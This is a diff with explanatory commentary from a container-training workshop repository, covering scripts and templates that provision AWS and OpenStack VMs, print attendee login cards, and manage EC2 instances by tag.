    Your {{ machine_is_or_machines_are }}:
    <ul>
    {% for node in cluster %}
      <li>node{{ loop.index }}: {{ node }}</li>
    {% endfor %}
    </ul>
  </p>
  <p>
    login: <b><code>docker</code></b>
    <br/>
    password: <b><code>training</code></b>
  </p>
  <p>For slides, chat and other useful links, see:
    <center>{{ url }}</center>
  </p>
</div>
{% endfor %}
</body>
</html>
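This removed Jinja2 template turned each cluster's IP list (the clusters and clustersize variables) into a printable card sheet, with the login and password on every card. The cncsetup.sh script below installs wkhtmltopdf and xvfb for exactly this kind of HTML-to-PDF step; a sketch of that conversion, with placeholder file names (the real pipeline is driven by the repo's scripts):

# Hypothetical: render a card sheet to PDF without a display server.
xvfb-run wkhtmltopdf cards.html cards.pdf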
12
prepare-vms/cncsetup.sh
Normal file
@@ -0,0 +1,12 @@
#!/bin/sh
if [ "$(whoami)" != ubuntu ]; then
    echo "This script should be executed on a freshly deployed node,"
    echo "with the 'ubuntu' user. Aborting."
    exit 1
fi
if id docker >/dev/null 2>&1; then
    sudo userdel -r docker
fi
sudo apt-get update -q
sudo apt-get install -qy jq python-pip wkhtmltopdf xvfb
pip install --user awscli jinja2 pdfkit pssh
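cncsetup.sh bootstraps the machine that drives a workshop: jq for JSON wrangling, wkhtmltopdf/xvfb for card printing, and the pip tools (awscli, jinja2, pdfkit, pssh) used by the other scripts. It is meant to be copied to a fresh VM and run there as the stock ubuntu user; a usage sketch (the host name is a placeholder):

# Hypothetical: run the setup on a freshly deployed node.
scp prepare-vms/cncsetup.sh ubuntu@node1:
ssh ubuntu@node1 sh cncsetup.sh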
@@ -7,7 +7,6 @@ services:
    working_dir: /root/prepare-vms
    volumes:
      - $HOME/.aws/:/root/.aws/
      - /etc/localtime:/etc/localtime:ro
      - $SSH_AUTH_SOCK:$SSH_AUTH_SOCK
      - $PWD/:/root/prepare-vms/
    environment:
@@ -15,5 +14,6 @@ services:
      AWS_ACCESS_KEY_ID: ${AWS_ACCESS_KEY_ID}
      AWS_SECRET_ACCESS_KEY: ${AWS_SECRET_ACCESS_KEY}
      AWS_DEFAULT_REGION: ${AWS_DEFAULT_REGION}
      AWS_INSTANCE_TYPE: ${AWS_INSTANCE_TYPE}
      USER: ${USER}
    entrypoint: /root/prepare-vms/workshopctl
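This compose service wraps the whole toolchain: it mounts the AWS credentials, the SSH agent socket, and the working tree, and uses workshopctl as its entrypoint, so commands can run without installing anything locally. A sketch (the service name is not visible in this hunk, so "prepare-vms" below is an assumption):

# Hypothetical invocation -- the compose service name is assumed.
docker-compose run prepare-vms maketag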
10
prepare-vms/e2e.sh
Executable file
@@ -0,0 +1,10 @@
#!/bin/sh
set -e
TAG=$(./workshopctl maketag)
./workshopctl start --settings settings/jerome.yaml --infra infra/aws-eu-central-1 --tag "$TAG"
./workshopctl deploy "$TAG"
./workshopctl kube "$TAG"
./workshopctl helmprom "$TAG"
while ! ./workshopctl kubetest "$TAG"; do sleep 1; done
./workshopctl tmux "$TAG"
echo ./workshopctl stop "$TAG"
6
prepare-vms/infra/example.aws
Normal file
@@ -0,0 +1,6 @@
INFRACLASS=aws
# If you are using AWS to deploy, copy this file (e.g. to "aws", or "us-east-1")
# and customize the variables below.
export AWS_DEFAULT_REGION=us-east-1
export AWS_ACCESS_KEY_ID=AKI...
export AWS_SECRET_ACCESS_KEY=...
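These infra files appear to be shell fragments that workshopctl reads, selected with the --infra flag (as in e2e.sh above). A sketch of the intended workflow, using a file name suggested in the comment:

# Hypothetical: copy the example, fill in real credentials, then use it.
cp infra/example.aws infra/us-east-1
./workshopctl start --settings settings/jerome.yaml --infra infra/us-east-1 --tag "$TAG"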
2
prepare-vms/infra/example.generic
Normal file
@@ -0,0 +1,2 @@
INFRACLASS=generic
# This is for manual provisioning. No other variable or configuration is needed.
9
prepare-vms/infra/example.openstack
Normal file
@@ -0,0 +1,9 @@
INFRACLASS=openstack
# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
# and customize the variables below.
export TF_VAR_user="jpetazzo"
export TF_VAR_tenant="training"
export TF_VAR_domain="Default"
export TF_VAR_password="..."
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
export TF_VAR_flavor="GP1.S"
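The TF_VAR_ prefix is Terraform's convention: any exported TF_VAR_name becomes the input variable "name", so sourcing the customized file is enough to parameterize a Terraform run. A sketch (the copied file name is a placeholder, and the Terraform invocation is assumed rather than taken from the repo):

# Hypothetical: source the infra file, then Terraform picks up TF_VAR_*.
. infra/openstack
terraform plan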
@@ -1,106 +0,0 @@
aws_display_tags() {
    # Print all "Name" tags in our region with their instance count
    echo "[#] [Status] [Token] [Tag]" \
        | awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
    aws ec2 describe-instances \
        --query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
        | tr -d "\r" \
        | uniq -c \
        | sort -k 3 \
        | awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}

aws_get_tokens() {
    aws ec2 describe-instances --output text \
        --query 'Reservations[*].Instances[*].[ClientToken]' \
        | sort -u
}

aws_display_instance_statuses_by_tag() {
    TAG=$1
    need_tag $TAG

    IDS=$(aws ec2 describe-instances \
        --filters "Name=tag:Name,Values=$TAG" \
        --query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')

    aws ec2 describe-instance-status \
        --instance-ids $IDS \
        --query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
        --output table
}

aws_display_instances_by_tag() {
    TAG=$1
    need_tag $TAG
    result=$(aws ec2 describe-instances --output table \
        --filter "Name=tag:Name,Values=$TAG" \
        --query "Reservations[*].Instances[*].[ \
            InstanceId, \
            State.Name, \
            Tags[0].Value, \
            PublicIpAddress, \
            InstanceType \
            ]"
    )
    if [[ -z $result ]]; then
        die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
    else
        echo "$result"
    fi
}

aws_get_instance_ids_by_filter() {
    FILTER=$1
    aws ec2 describe-instances --filters $FILTER \
        --query "Reservations[*].Instances[*].InstanceId" \
        --output text | tr "\t" "\n" | tr -d "\r"
}

aws_get_instance_ids_by_client_token() {
    TOKEN=$1
    need_tag $TOKEN
    aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}

aws_get_instance_ids_by_tag() {
    TAG=$1
    need_tag $TAG
    aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}

aws_get_instance_ips_by_tag() {
    TAG=$1
    need_tag $TAG
    aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
        --output text \
        --query "Reservations[*].Instances[*].PublicIpAddress" \
        | tr "\t" "\n" \
        | sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}

aws_kill_instances_by_tag() {
    TAG=$1
    need_tag $TAG
    IDS=$(aws_get_instance_ids_by_tag $TAG)
    if [ -z "$IDS" ]; then
        die "Invalid tag."
    fi

    info "Deleting instances with tag $TAG."

    aws ec2 terminate-instances --instance-ids $IDS \
        | grep ^TERMINATINGINSTANCES

    info "Deleted instances with tag $TAG."
}

aws_tag_instances() {
    OLD_TAG_OR_TOKEN=$1
    NEW_TAG=$2
    IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
    [[ -n "$IDS" ]] && aws ec2 create-tags --tags Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
    IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
    [[ -n "$IDS" ]] && aws ec2 create-tags --tags Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}
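These removed helpers all share one pattern: take a workshop tag (or EC2 client token), resolve it to instance IDs via describe-instances, then inspect or act on those instances. Typical invocations would have looked like this (the tag value is a placeholder):

# Hypothetical calls into the removed helper library.
aws_display_instances_by_tag 2018-01-15-jp
aws_get_instance_ips_by_tag 2018-01-15-jp > ips.txt
aws_kill_instances_by_tag 2018-01-15-jp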
Some files were not shown because too many files have changed in this diff.